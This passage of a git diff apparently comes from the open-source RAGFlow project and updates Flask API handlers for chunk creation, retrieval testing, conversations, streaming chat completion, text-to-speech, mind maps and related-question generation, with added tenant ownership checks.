-            tenant_id, LLMType.EMBEDDING.value)
-        v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
-        DocumentService.increment_chunk_num(req["doc_id"], doc.kb_id, c, 1, 0)
-        v = 0.1 * v[0] + 0.9 * v[1]
-        d["q_%d_vec" % len(v)] = v.tolist()
-        ELASTICSEARCH.upsert([d], search.index_name(tenant_id))
-        return get_json_result(data={"chunk_id": chunck_id})
-    except Exception as e:
-        return server_error_response(e)
-
-
-@manager.route('/retrieval_test', methods=['POST'])
-@login_required
-@validate_request("kb_id", "question")
-def retrieval_test():
-    req = request.json
-    page = int(req.get("page", 1))
-    size = int(req.get("size", 30))
-    question = req["question"]
-    kb_id = req["kb_id"]
-    doc_ids = req.get("doc_ids", [])
-    similarity_threshold = float(req.get("similarity_threshold", 0.2))
-    vector_similarity_weight = float(req.get("vector_similarity_weight", 0.3))
-    top = int(req.get("top_k", 1024))
-    try:
-        e, kb = KnowledgebaseService.get_by_id(kb_id)
-        if not e:
-            return get_data_error_result(retmsg="Knowledgebase not found!")
-
-        embd_mdl = TenantLLMService.model_instance(
-            kb.tenant_id, LLMType.EMBEDDING.value, llm_name=kb.embd_id)
-        ranks = retrievaler.retrieval(question, embd_mdl, kb.tenant_id, [kb_id], page, size, similarity_threshold,
-                                      vector_similarity_weight, top, doc_ids)
-        for c in ranks["chunks"]:
-            if "vector" in c:
-                del c["vector"]
-
-        return get_json_result(data=ranks)
-    except Exception as e:
-        if str(e).find("not_found") > 0:
-            return get_json_result(data=False, retmsg=f'No chunk found! Check the chunk status please!',
-                                   retcode=RetCode.DATA_ERROR)
-        return server_error_response(e)
+
+@manager.route('/create', methods=['POST'])  # noqa: F821
+@login_required
+@validate_request("doc_id", "content_with_weight")
+def create():
+    req = request.json
+    chunck_id = xxhash.xxh64((req["content_with_weight"] + req["doc_id"]).encode("utf-8")).hexdigest()
+    d = {"id": chunck_id, "content_ltks": rag_tokenizer.tokenize(req["content_with_weight"]),
+         "content_with_weight": req["content_with_weight"]}
+    d["content_sm_ltks"] = rag_tokenizer.fine_grained_tokenize(d["content_ltks"])
+    d["important_kwd"] = req.get("important_kwd", [])
+    if not isinstance(d["important_kwd"], list):
+        return get_data_error_result(message="`important_kwd` is required to be a list")
+    d["important_tks"] = rag_tokenizer.tokenize(" ".join(d["important_kwd"]))
+    d["question_kwd"] = req.get("question_kwd", [])
+    if not isinstance(d["question_kwd"], list):
+        return get_data_error_result(message="`question_kwd` is required to be a list")
+    d["question_tks"] = rag_tokenizer.tokenize("\n".join(d["question_kwd"]))
+    d["create_time"] = str(datetime.datetime.now()).replace("T", " ")[:19]
+    d["create_timestamp_flt"] = datetime.datetime.now().timestamp()
+    if "tag_feas" in req:
+        d["tag_feas"] = req["tag_feas"]
+
+    try:
+        e, doc = DocumentService.get_by_id(req["doc_id"])
+        if not e:
+            return get_data_error_result(message="Document not found!")
+        d["kb_id"] = [doc.kb_id]
+        d["docnm_kwd"] = doc.name
+        d["title_tks"] = rag_tokenizer.tokenize(doc.name)
+        d["doc_id"] = doc.id
+
+        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
+        if not tenant_id:
+            return get_data_error_result(message="Tenant not found!")
+
+        e, kb = KnowledgebaseService.get_by_id(doc.kb_id)
+        if not e:
+            return get_data_error_result(message="Knowledgebase not found!")
+        if kb.pagerank:
+            d[PAGERANK_FLD] = kb.pagerank
+
+        embd_id = DocumentService.get_embd_id(req["doc_id"])
+        embd_mdl = LLMBundle(tenant_id, LLMType.EMBEDDING.value, embd_id)
+
+        v, c = embd_mdl.encode([doc.name, req["content_with_weight"] if not d["question_kwd"] else "\n".join(d["question_kwd"])])
+        v = 0.1 * v[0] + 0.9 * v[1]
+        d["q_%d_vec" % len(v)] = v.tolist()
+        settings.docStoreConn.insert([d], search.index_name(tenant_id), doc.kb_id)
+
+        DocumentService.increment_chunk_num(
+            doc.id, doc.kb_id, c, 1, 0)
+        return get_json_result(data={"chunk_id": chunck_id})
+    except Exception as e:
+        return server_error_response(e)
+
+
+@manager.route('/retrieval_test', methods=['POST'])  # noqa: F821
+@login_required
+@validate_request("kb_id", "question")
+def retrieval_test():
+    req = request.json
+    page = int(req.get("page", 1))
+    size = int(req.get("size", 30))
+    question = req["question"]
+    kb_ids = req["kb_id"]
+    if isinstance(kb_ids, str):
+        kb_ids = [kb_ids]
+    doc_ids = req.get("doc_ids", [])
+    similarity_threshold = float(req.get("similarity_threshold", 0.0))
+    vector_similarity_weight = float(req.get("vector_similarity_weight", 0.3))
+    use_kg = req.get("use_kg", False)
+    top = int(req.get("top_k", 1024))
+    langs = req.get("cross_languages", [])
+    tenant_ids = []
+
+    try:
+        tenants = UserTenantService.query(user_id=current_user.id)
+        for kb_id in kb_ids:
+            for tenant in tenants:
+                if KnowledgebaseService.query(
+                        tenant_id=tenant.tenant_id, id=kb_id):
+                    tenant_ids.append(tenant.tenant_id)
+                    break
+            else:
+                return get_json_result(
+                    data=False, message='Only owner of knowledgebase authorized for this operation.',
+                    code=settings.RetCode.OPERATING_ERROR)
+
+        e, kb = KnowledgebaseService.get_by_id(kb_ids[0])
+        if not e:
+            return get_data_error_result(message="Knowledgebase not found!")
+
+        if langs:
+            question = cross_languages(kb.tenant_id, None, question, langs)
+
+        embd_mdl = LLMBundle(kb.tenant_id, LLMType.EMBEDDING.value, llm_name=kb.embd_id)
+
+        rerank_mdl = None
+        if req.get("rerank_id"):
+            rerank_mdl = LLMBundle(kb.tenant_id, LLMType.RERANK.value, llm_name=req["rerank_id"])
+
+        if req.get("keyword", False):
+            chat_mdl = LLMBundle(kb.tenant_id, LLMType.CHAT)
+            question += keyword_extraction(chat_mdl, question)
+
+        labels = label_question(question, [kb])
+        ranks = settings.retrievaler.retrieval(question, embd_mdl, tenant_ids, kb_ids, page, size,
+                                               similarity_threshold, vector_similarity_weight, top,
+                                               doc_ids, rerank_mdl=rerank_mdl, highlight=req.get("highlight"),
+                                               rank_feature=labels
+                                               )
+        if use_kg:
+            ck = settings.kg_retrievaler.retrieval(question,
+                                                   tenant_ids,
+                                                   kb_ids,
+                                                   embd_mdl,
+                                                   LLMBundle(kb.tenant_id, LLMType.CHAT))
+            if ck["content_with_weight"]:
+                ranks["chunks"].insert(0, ck)
+
+        for c in ranks["chunks"]:
+            c.pop("vector", None)
+        ranks["labels"] = labels
+
+        return get_json_result(data=ranks)
+    except Exception as e:
+        if str(e).find("not_found") > 0:
+            return get_json_result(data=False, message='No chunk found! Check the chunk status please!',
+                                   code=settings.RetCode.DATA_ERROR)
+        return server_error_response(e)
+
+
+@manager.route('/knowledge_graph', methods=['GET'])  # noqa: F821
+@login_required
+def knowledge_graph():
+    doc_id = request.args["doc_id"]
+    tenant_id = DocumentService.get_tenant_id(doc_id)
+    kb_ids = KnowledgebaseService.get_kb_ids(tenant_id)
+    req = {
+        "doc_ids": [doc_id],
+        "knowledge_graph_kwd": ["graph", "mind_map"]
+    }
+    sres = settings.retrievaler.search(req, search.index_name(tenant_id), kb_ids)
+    obj = {"graph": {}, "mind_map": {}}
+    for id in sres.ids[:2]:
+        ty = sres.field[id]["knowledge_graph_kwd"]
+        try:
+            content_json = json.loads(sres.field[id]["content_with_weight"])
+        except Exception:
+            continue
+
+        if ty == 'mind_map':
+            node_dict = {}
+
+            def repeat_deal(content_json, node_dict):
+                if 'id' in content_json:
+                    if content_json['id'] in node_dict:
+                        node_name = content_json['id']
+                        content_json['id'] += f"({node_dict[content_json['id']]})"
+                        node_dict[node_name] += 1
+                    else:
+                        node_dict[content_json['id']] = 1
+                if 'children' in content_json and content_json['children']:
+                    for item in content_json['children']:
+                        repeat_deal(item, node_dict)
+
+            repeat_deal(content_json, node_dict)
+
+        obj[ty] = content_json
+
+    return get_json_result(data=obj)
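The rewritten `set()`/`create()` handlers above replace the old `huqie` helpers with `rag_tokenizer` and write through `settings.docStoreConn` instead of `ELASTICSEARCH`. A sketch of the tokenize-then-embed shape the two handlers share, assuming an `embd_mdl` LLMBundle is already in scope; field names follow the code above:

# Sketch of the chunk-field preparation shared by set()/create().
d = {"id": "chunk-id", "content_with_weight": "What is RAGFlow?\tAn open-source RAG engine."}
d["content_ltks"] = rag_tokenizer.tokenize(d["content_with_weight"])
d["content_sm_ltks"] = rag_tokenizer.fine_grained_tokenize(d["content_ltks"])

# The embedding blends the document title with the chunk body (0.1 / 0.9);
# Q&A chunks use the body vector alone.
v, _ = embd_mdl.encode(["doc title", d["content_with_weight"]])
v = 0.1 * v[0] + 0.9 * v[1]
d["q_%d_vec" % len(v)] = v.tolist()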
api/apps/conversation_app.py  (modified)
@@ -1,135 +1,411 @@
#
|
#
|
||||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||||
#
|
#
|
||||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||||
# you may not use this file except in compliance with the License.
|
# you may not use this file except in compliance with the License.
|
||||||
# You may obtain a copy of the License at
|
# You may obtain a copy of the License at
|
||||||
#
|
#
|
||||||
# http://www.apache.org/licenses/LICENSE-2.0
|
# http://www.apache.org/licenses/LICENSE-2.0
|
||||||
#
|
#
|
||||||
# Unless required by applicable law or agreed to in writing, software
|
# Unless required by applicable law or agreed to in writing, software
|
||||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||||
# See the License for the specific language governing permissions and
|
# See the License for the specific language governing permissions and
|
||||||
# limitations under the License.
|
# limitations under the License.
|
||||||
#
|
#
|
||||||
from flask import request
|
import json
|
||||||
from flask_login import login_required
|
import re
|
||||||
from api.db.services.dialog_service import DialogService, ConversationService, chat
|
import traceback
|
||||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
from copy import deepcopy
|
||||||
from api.utils import get_uuid
|
|
||||||
from api.utils.api_utils import get_json_result
|
import trio
|
||||||
|
from flask import Response, request
|
||||||
|
from flask_login import current_user, login_required
|
||||||
@manager.route('/set', methods=['POST'])
|
|
||||||
@login_required
|
from api import settings
|
||||||
def set_conversation():
|
from api.db import LLMType
|
||||||
req = request.json
|
from api.db.db_models import APIToken
|
||||||
conv_id = req.get("conversation_id")
|
from api.db.services.conversation_service import ConversationService, structure_answer
|
||||||
if conv_id:
|
from api.db.services.dialog_service import DialogService, ask, chat
|
||||||
del req["conversation_id"]
|
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||||
try:
|
from api.db.services.llm_service import LLMBundle, TenantService
|
||||||
if not ConversationService.update_by_id(conv_id, req):
|
from api.db.services.user_service import UserTenantService
|
||||||
return get_data_error_result(retmsg="Conversation not found!")
|
from api.utils.api_utils import get_data_error_result, get_json_result, server_error_response, validate_request
|
||||||
e, conv = ConversationService.get_by_id(conv_id)
|
from graphrag.general.mind_map_extractor import MindMapExtractor
|
||||||
if not e:
|
from rag.app.tag import label_question
|
||||||
return get_data_error_result(
|
from rag.prompts.prompts import chunks_format
|
||||||
retmsg="Fail to update a conversation!")
|

New version (right-hand column of the diff):

import json
import re
import traceback
from copy import deepcopy

import trio
from flask import Response, request
from flask_login import current_user, login_required

from api import settings
from api.db import LLMType
from api.db.db_models import APIToken
from api.db.services.conversation_service import ConversationService, structure_answer
from api.db.services.dialog_service import DialogService, ask, chat
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMBundle, TenantService
from api.db.services.user_service import UserTenantService
from api.utils.api_utils import get_data_error_result, get_json_result, server_error_response, validate_request
from graphrag.general.mind_map_extractor import MindMapExtractor
from rag.app.tag import label_question
from rag.prompts.prompts import chunks_format


@manager.route("/set", methods=["POST"])  # noqa: F821
@login_required
def set_conversation():
    req = request.json
    conv_id = req.get("conversation_id")
    is_new = req.get("is_new")
    name = req.get("name", "New conversation")
    req["user_id"] = current_user.id

    if len(name) > 255:
        name = name[0:255]

    del req["is_new"]
    if not is_new:
        del req["conversation_id"]
        try:
            if not ConversationService.update_by_id(conv_id, req):
                return get_data_error_result(message="Conversation not found!")
            e, conv = ConversationService.get_by_id(conv_id)
            if not e:
                return get_data_error_result(message="Fail to update a conversation!")
            conv = conv.to_dict()
            return get_json_result(data=conv)
        except Exception as e:
            return server_error_response(e)

    try:
        e, dia = DialogService.get_by_id(req["dialog_id"])
        if not e:
            return get_data_error_result(message="Dialog not found")
        conv = {"id": conv_id, "dialog_id": req["dialog_id"], "name": name, "message": [{"role": "assistant", "content": dia.prompt_config["prologue"]}], "user_id": current_user.id}
        ConversationService.save(**conv)
        return get_json_result(data=conv)
    except Exception as e:
        return server_error_response(e)
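
Example (illustration, not part of the diff): a minimal client sketch for the new /set contract. Two assumptions are made here: the blueprint is mounted under http://localhost:9380/v1/conversation, and `cookies` carries an authenticated login session. With is_new, the client now supplies the conversation id itself.

    import uuid
    import requests

    BASE = "http://localhost:9380/v1/conversation"        # assumed mount point
    cookies = {"session": "<session cookie from login>"}  # assumed auth

    # Create: the caller generates the id and sets is_new=True.
    conv_id = uuid.uuid4().hex
    r = requests.post(f"{BASE}/set", cookies=cookies, json={
        "is_new": True, "conversation_id": conv_id,
        "dialog_id": "<dialog id>", "name": "My first conversation",
    })
    print(r.json())

    # Rename: is_new=False updates the stored record instead.
    r = requests.post(f"{BASE}/set", cookies=cookies, json={
        "is_new": False, "conversation_id": conv_id, "name": "Renamed",
    })
    print(r.json())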

@manager.route("/get", methods=["GET"])  # noqa: F821
@login_required
def get():
    conv_id = request.args["conversation_id"]
    try:
        e, conv = ConversationService.get_by_id(conv_id)
        if not e:
            return get_data_error_result(message="Conversation not found!")
        tenants = UserTenantService.query(user_id=current_user.id)
        avatar = None
        for tenant in tenants:
            dialog = DialogService.query(tenant_id=tenant.tenant_id, id=conv.dialog_id)
            if dialog and len(dialog) > 0:
                avatar = dialog[0].icon
                break
        else:
            return get_json_result(data=False, message="Only owner of conversation authorized for this operation.", code=settings.RetCode.OPERATING_ERROR)

        for ref in conv.reference:
            if isinstance(ref, list):
                continue
            ref["chunks"] = chunks_format(ref)

        conv = conv.to_dict()
        conv["avatar"] = avatar
        return get_json_result(data=conv)
    except Exception as e:
        return server_error_response(e)

@manager.route("/getsse/<dialog_id>", methods=["GET"])  # type: ignore # noqa: F821
def getsse(dialog_id):
    token = request.headers.get("Authorization").split()
    if len(token) != 2:
        return get_data_error_result(message='Authorization is not valid!"')
    token = token[1]
    objs = APIToken.query(beta=token)
    if not objs:
        return get_data_error_result(message='Authentication error: API key is invalid!"')
    try:
        e, conv = DialogService.get_by_id(dialog_id)
        if not e:
            return get_data_error_result(message="Dialog not found!")
        conv = conv.to_dict()
        conv["avatar"] = conv["icon"]
        del conv["icon"]
        return get_json_result(data=conv)
    except Exception as e:
        return server_error_response(e)
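
Example (illustration, not part of the diff): /getsse/<dialog_id> is the one route here that skips @login_required and instead checks the "beta" field of an API token, so embedded chat widgets can call it. A sketch, under the same base-URL assumption as above:

    import requests

    r = requests.get(
        "http://localhost:9380/v1/conversation/getsse/<dialog_id>",  # assumed mount point
        headers={"Authorization": "Bearer <APIToken.beta value>"},
    )
    print(r.json())   # the dialog record, with "icon" renamed to "avatar"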

@manager.route("/rm", methods=["POST"])  # noqa: F821
@login_required
def rm():
    conv_ids = request.json["conversation_ids"]
    try:
        for cid in conv_ids:
            exist, conv = ConversationService.get_by_id(cid)
            if not exist:
                return get_data_error_result(message="Conversation not found!")
            tenants = UserTenantService.query(user_id=current_user.id)
            for tenant in tenants:
                if DialogService.query(tenant_id=tenant.tenant_id, id=conv.dialog_id):
                    break
            else:
                return get_json_result(data=False, message="Only owner of conversation authorized for this operation.", code=settings.RetCode.OPERATING_ERROR)
            ConversationService.delete_by_id(cid)
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)

@manager.route("/list", methods=["GET"])  # noqa: F821
@login_required
def list_conversation():
    dialog_id = request.args["dialog_id"]
    try:
        if not DialogService.query(tenant_id=current_user.id, id=dialog_id):
            return get_json_result(data=False, message="Only owner of dialog authorized for this operation.", code=settings.RetCode.OPERATING_ERROR)
        convs = ConversationService.query(dialog_id=dialog_id, order_by=ConversationService.model.create_time, reverse=True)

        convs = [d.to_dict() for d in convs]
        return get_json_result(data=convs)
    except Exception as e:
        return server_error_response(e)

@manager.route("/completion", methods=["POST"])  # noqa: F821
@login_required
@validate_request("conversation_id", "messages")
def completion():
    req = request.json
    msg = []
    for m in req["messages"]:
        if m["role"] == "system":
            continue
        if m["role"] == "assistant" and not msg:
            continue
        msg.append(m)
    message_id = msg[-1].get("id")
    try:
        e, conv = ConversationService.get_by_id(req["conversation_id"])
        if not e:
            return get_data_error_result(message="Conversation not found!")
        conv.message = deepcopy(req["messages"])
        e, dia = DialogService.get_by_id(conv.dialog_id)
        if not e:
            return get_data_error_result(message="Dialog not found!")
        del req["conversation_id"]
        del req["messages"]

        if not conv.reference:
            conv.reference = []
        else:
            for ref in conv.reference:
                if isinstance(ref, list):
                    continue
                ref["chunks"] = chunks_format(ref)

        if not conv.reference:
            conv.reference = []
        conv.reference.append({"chunks": [], "doc_aggs": []})

        def stream():
            nonlocal dia, msg, req, conv
            try:
                for ans in chat(dia, msg, True, **req):
                    ans = structure_answer(conv, ans, message_id, conv.id)
                    yield "data:" + json.dumps({"code": 0, "message": "", "data": ans}, ensure_ascii=False) + "\n\n"
                ConversationService.update_by_id(conv.id, conv.to_dict())
            except Exception as e:
                traceback.print_exc()
                yield "data:" + json.dumps({"code": 500, "message": str(e), "data": {"answer": "**ERROR**: " + str(e), "reference": []}}, ensure_ascii=False) + "\n\n"
            yield "data:" + json.dumps({"code": 0, "message": "", "data": True}, ensure_ascii=False) + "\n\n"

        if req.get("stream", True):
            resp = Response(stream(), mimetype="text/event-stream")
            resp.headers.add_header("Cache-control", "no-cache")
            resp.headers.add_header("Connection", "keep-alive")
            resp.headers.add_header("X-Accel-Buffering", "no")
            resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
            return resp

        else:
            answer = None
            for ans in chat(dia, msg, **req):
                answer = structure_answer(conv, ans, message_id, conv.id)
                ConversationService.update_by_id(conv.id, conv.to_dict())
                break
            return get_json_result(data=answer)
    except Exception as e:
        return server_error_response(e)
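
Example (illustration, not part of the diff): consuming the streaming /completion response. Each SSE frame is a "data:" line carrying JSON, and a final frame whose data is true marks the end of the stream. A sketch, under the same base-URL and session-cookie assumptions as above:

    import json
    import requests

    resp = requests.post(
        "http://localhost:9380/v1/conversation/completion",  # assumed mount point
        cookies={"session": "<session cookie>"},             # assumed auth
        json={
            "conversation_id": "<conversation id>",
            "messages": [{"id": "<message id>", "role": "user", "content": "What is RAGFlow?"}],
            "stream": True,
        },
        stream=True,
    )
    for line in resp.iter_lines(decode_unicode=True):
        if not line or not line.startswith("data:"):
            continue
        event = json.loads(line[len("data:"):])
        if event["data"] is True:        # end-of-stream sentinel
            break
        print(event["data"]["answer"])   # progressively longer answer text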

@manager.route("/tts", methods=["POST"])  # noqa: F821
@login_required
def tts():
    req = request.json
    text = req["text"]

    tenants = TenantService.get_info_by(current_user.id)
    if not tenants:
        return get_data_error_result(message="Tenant not found!")

    tts_id = tenants[0]["tts_id"]
    if not tts_id:
        return get_data_error_result(message="No default TTS model is set")

    tts_mdl = LLMBundle(tenants[0]["tenant_id"], LLMType.TTS, tts_id)

    def stream_audio():
        try:
            for txt in re.split(r"[,。/《》?;:!\n\r:;]+", text):
                for chunk in tts_mdl.tts(txt):
                    yield chunk
        except Exception as e:
            yield ("data:" + json.dumps({"code": 500, "message": str(e), "data": {"answer": "**ERROR**: " + str(e)}}, ensure_ascii=False)).encode("utf-8")

    resp = Response(stream_audio(), mimetype="audio/mpeg")
    resp.headers.add_header("Cache-Control", "no-cache")
    resp.headers.add_header("Connection", "keep-alive")
    resp.headers.add_header("X-Accel-Buffering", "no")

    return resp
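
Example (illustration, not part of the diff): /tts streams MPEG audio chunks sentence by sentence, so the response can be written straight to a file or piped to a player. A sketch with the same assumed base URL and auth:

    import requests

    resp = requests.post(
        "http://localhost:9380/v1/conversation/tts",  # assumed mount point
        cookies={"session": "<session cookie>"},      # assumed auth
        json={"text": "Hello from RAGFlow."},
        stream=True,
    )
    with open("answer.mp3", "wb") as f:               # response mimetype is audio/mpeg
        for chunk in resp.iter_content(chunk_size=8192):
            f.write(chunk)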

@manager.route("/delete_msg", methods=["POST"])  # noqa: F821
@login_required
@validate_request("conversation_id", "message_id")
def delete_msg():
    req = request.json
    e, conv = ConversationService.get_by_id(req["conversation_id"])
    if not e:
        return get_data_error_result(message="Conversation not found!")

    conv = conv.to_dict()
    for i, msg in enumerate(conv["message"]):
        if req["message_id"] != msg.get("id", ""):
            continue
        assert conv["message"][i + 1]["id"] == req["message_id"]
        conv["message"].pop(i)
        conv["message"].pop(i)
        conv["reference"].pop(max(0, i // 2 - 1))
        break

    ConversationService.update_by_id(conv["id"], conv)
    return get_json_result(data=conv)

@manager.route("/thumbup", methods=["POST"])  # noqa: F821
@login_required
@validate_request("conversation_id", "message_id")
def thumbup():
    req = request.json
    e, conv = ConversationService.get_by_id(req["conversation_id"])
    if not e:
        return get_data_error_result(message="Conversation not found!")
    up_down = req.get("thumbup")
    feedback = req.get("feedback", "")
    conv = conv.to_dict()
    for i, msg in enumerate(conv["message"]):
        if req["message_id"] == msg.get("id", "") and msg.get("role", "") == "assistant":
            if up_down:
                msg["thumbup"] = True
                if "feedback" in msg:
                    del msg["feedback"]
            else:
                msg["thumbup"] = False
                if feedback:
                    msg["feedback"] = feedback
            break

    ConversationService.update_by_id(conv["id"], conv)
    return get_json_result(data=conv)
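
Example (illustration, not part of the diff): /thumbup stores per-message feedback on the assistant turn. A truthy "thumbup" clears any previous feedback text; a falsy one records it. A sketch, same assumptions as above:

    import requests

    requests.post(
        "http://localhost:9380/v1/conversation/thumbup",  # assumed mount point
        cookies={"session": "<session cookie>"},          # assumed auth
        json={
            "conversation_id": "<conversation id>",
            "message_id": "<assistant message id>",
            "thumbup": False,
            "feedback": "The cited chunk does not answer the question.",
        },
    )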

@manager.route("/ask", methods=["POST"])  # noqa: F821
@login_required
@validate_request("question", "kb_ids")
def ask_about():
    req = request.json
    uid = current_user.id

    def stream():
        nonlocal req, uid
        try:
            for ans in ask(req["question"], req["kb_ids"], uid):
                yield "data:" + json.dumps({"code": 0, "message": "", "data": ans}, ensure_ascii=False) + "\n\n"
        except Exception as e:
            yield "data:" + json.dumps({"code": 500, "message": str(e), "data": {"answer": "**ERROR**: " + str(e), "reference": []}}, ensure_ascii=False) + "\n\n"
        yield "data:" + json.dumps({"code": 0, "message": "", "data": True}, ensure_ascii=False) + "\n\n"

    resp = Response(stream(), mimetype="text/event-stream")
    resp.headers.add_header("Cache-control", "no-cache")
    resp.headers.add_header("Connection", "keep-alive")
    resp.headers.add_header("X-Accel-Buffering", "no")
    resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
    return resp

@manager.route("/mindmap", methods=["POST"])  # noqa: F821
@login_required
@validate_request("question", "kb_ids")
def mindmap():
    req = request.json
    kb_ids = req["kb_ids"]
    e, kb = KnowledgebaseService.get_by_id(kb_ids[0])
    if not e:
        return get_data_error_result(message="Knowledgebase not found!")

    embd_mdl = LLMBundle(kb.tenant_id, LLMType.EMBEDDING, llm_name=kb.embd_id)
    chat_mdl = LLMBundle(current_user.id, LLMType.CHAT)
    question = req["question"]
    ranks = settings.retrievaler.retrieval(question, embd_mdl, kb.tenant_id, kb_ids, 1, 12, 0.3, 0.3, aggs=False, rank_feature=label_question(question, [kb]))
    mindmap = MindMapExtractor(chat_mdl)
    mind_map = trio.run(mindmap, [c["content_with_weight"] for c in ranks["chunks"]])
    mind_map = mind_map.output
    if "error" in mind_map:
        return server_error_response(Exception(mind_map["error"]))
    return get_json_result(data=mind_map)
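
Example (illustration, not part of the diff): /mindmap retrieves the top-ranked chunks for the question and has the chat model arrange them as a mind map. Note that kb_ids is a list, but kb_ids[0] alone determines the tenant and embedding model. A sketch, same assumptions as above:

    import requests

    r = requests.post(
        "http://localhost:9380/v1/conversation/mindmap",  # assumed mount point
        cookies={"session": "<session cookie>"},          # assumed auth
        json={"question": "electric vehicles", "kb_ids": ["<knowledge base id>"]},
    )
    print(r.json()["data"])   # nested mind-map structure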

@manager.route("/related_questions", methods=["POST"])  # noqa: F821
@login_required
@validate_request("question")
def related_questions():
    req = request.json
    question = req["question"]
    chat_mdl = LLMBundle(current_user.id, LLMType.CHAT)
    prompt = """
Role: You are an AI language model assistant tasked with generating 5-10 related questions based on a user's original query. These questions should help expand the search query scope and improve search relevance.

Instructions:
Input: You are provided with a user's question.
Output: Generate 5-10 alternative questions that are related to the original user question. These alternatives should help retrieve a broader range of relevant documents from a vector database.
Context: Focus on rephrasing the original question in different ways, making sure the alternative questions are diverse but still connected to the topic of the original query. Do not create overly obscure, irrelevant, or unrelated questions.
Fallback: If you cannot generate any relevant alternatives, do not return any questions.
Guidance:
1. Each alternative should be unique but still relevant to the original query.
2. Keep the phrasing clear, concise, and easy to understand.
3. Avoid overly technical jargon or specialized terms unless directly relevant.
4. Ensure that each question contributes towards improving search results by broadening the search angle, not narrowing it.

Example:
Original Question: What are the benefits of electric vehicles?

Alternative Questions:
1. How do electric vehicles impact the environment?
2. What are the advantages of owning an electric car?
3. What is the cost-effectiveness of electric vehicles?
4. How do electric vehicles compare to traditional cars in terms of fuel efficiency?
5. What are the environmental benefits of switching to electric cars?
6. How do electric vehicles help reduce carbon emissions?
7. Why are electric vehicles becoming more popular?
8. What are the long-term savings of using electric vehicles?
9. How do electric vehicles contribute to sustainability?
10. What are the key benefits of electric vehicles for consumers?

Reason:
Rephrasing the original query into multiple alternative questions helps the user explore different aspects of their search topic, improving the quality of search results.
These questions guide the search engine to provide a more comprehensive set of relevant documents.
"""
    ans = chat_mdl.chat(
        prompt,
        [
            {
                "role": "user",
                "content": f"""
Keywords: {question}
Related search terms:
""",
            }
        ],
        {"temperature": 0.9},
    )
    return get_json_result(data=[re.sub(r"^[0-9]\. ", "", a) for a in ans.split("\n") if re.match(r"^[0-9]\. ", a)])
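
Example (illustration, not part of the diff): the handler keeps only response lines that start with a digit and a dot and strips that numbering, so the endpoint returns a plain list of rephrasings. A sketch, same assumptions as above:

    import requests

    r = requests.post(
        "http://localhost:9380/v1/conversation/related_questions",  # assumed mount point
        cookies={"session": "<session cookie>"},                    # assumed auth
        json={"question": "What are the benefits of electric vehicles?"},
    )
    print(r.json()["data"])   # e.g. ["How do electric vehicles impact the environment?", ...]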

api/apps/dialog_app.py (@@ -1,170 +1,176 @@): the license header is unchanged between the two versions:

#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

Old version (left-hand column of the diff). Its default prompt strings are Chinese: the system prompt instructs the assistant to answer from the knowledge base and to say the answer was not found when nothing is relevant, and the prologue is a friendly greeting.

from flask import request
from flask_login import login_required, current_user
from api.db.services.dialog_service import DialogService
from api.db import StatusEnum
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.user_service import TenantService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid
from api.utils.api_utils import get_json_result


@manager.route('/set', methods=['POST'])
@login_required
def set_dialog():
    req = request.json
    dialog_id = req.get("dialog_id")
    name = req.get("name", "New Dialog")
    description = req.get("description", "A helpful Dialog")
    top_n = req.get("top_n", 6)
    similarity_threshold = req.get("similarity_threshold", 0.1)
    vector_similarity_weight = req.get("vector_similarity_weight", 0.3)
    llm_setting = req.get("llm_setting", {
        "temperature": 0.1,
        "top_p": 0.3,
        "frequency_penalty": 0.7,
        "presence_penalty": 0.4,
        "max_tokens": 215
    })
    default_prompt = {
        "system": """你是一个智能助手,请总结知识库的内容来回答问题,请列举知识库中的数据详细回答。当所有知识库内容都与问题无关时,你的回答必须包括"知识库中未找到您要的答案!"这句话。回答需要考虑聊天历史。
以下是知识库:
{knowledge}
以上是知识库。""",
        "prologue": "您好,我是您的助手小樱,长得可爱又善良,can I help you?",
        "parameters": [
            {"key": "knowledge", "optional": False}
        ],
        "empty_response": "Sorry! 知识库中未找到相关内容!"
    }
    prompt_config = req.get("prompt_config", default_prompt)

    if not prompt_config["system"]:
        prompt_config["system"] = default_prompt["system"]
    # if len(prompt_config["parameters"]) < 1:
    #     prompt_config["parameters"] = default_prompt["parameters"]
    # for p in prompt_config["parameters"]:
    #     if p["key"] == "knowledge":break
    # else: prompt_config["parameters"].append(default_prompt["parameters"][0])

    for p in prompt_config["parameters"]:
        if p["optional"]:
            continue
        if prompt_config["system"].find("{%s}" % p["key"]) < 0:
            return get_data_error_result(
                retmsg="Parameter '{}' is not used".format(p["key"]))

    try:
        e, tenant = TenantService.get_by_id(current_user.id)
        if not e:
            return get_data_error_result(retmsg="Tenant not found!")
        llm_id = req.get("llm_id", tenant.llm_id)
        if not dialog_id:
            if not req.get("kb_ids"):
                return get_data_error_result(
                    retmsg="Fail! Please select knowledgebase!")
            dia = {
                "id": get_uuid(),
                "tenant_id": current_user.id,
                "name": name,
                "kb_ids": req["kb_ids"],
                "description": description,
                "llm_id": llm_id,
                "llm_setting": llm_setting,
                "prompt_config": prompt_config,
                "top_n": top_n,
                "similarity_threshold": similarity_threshold,
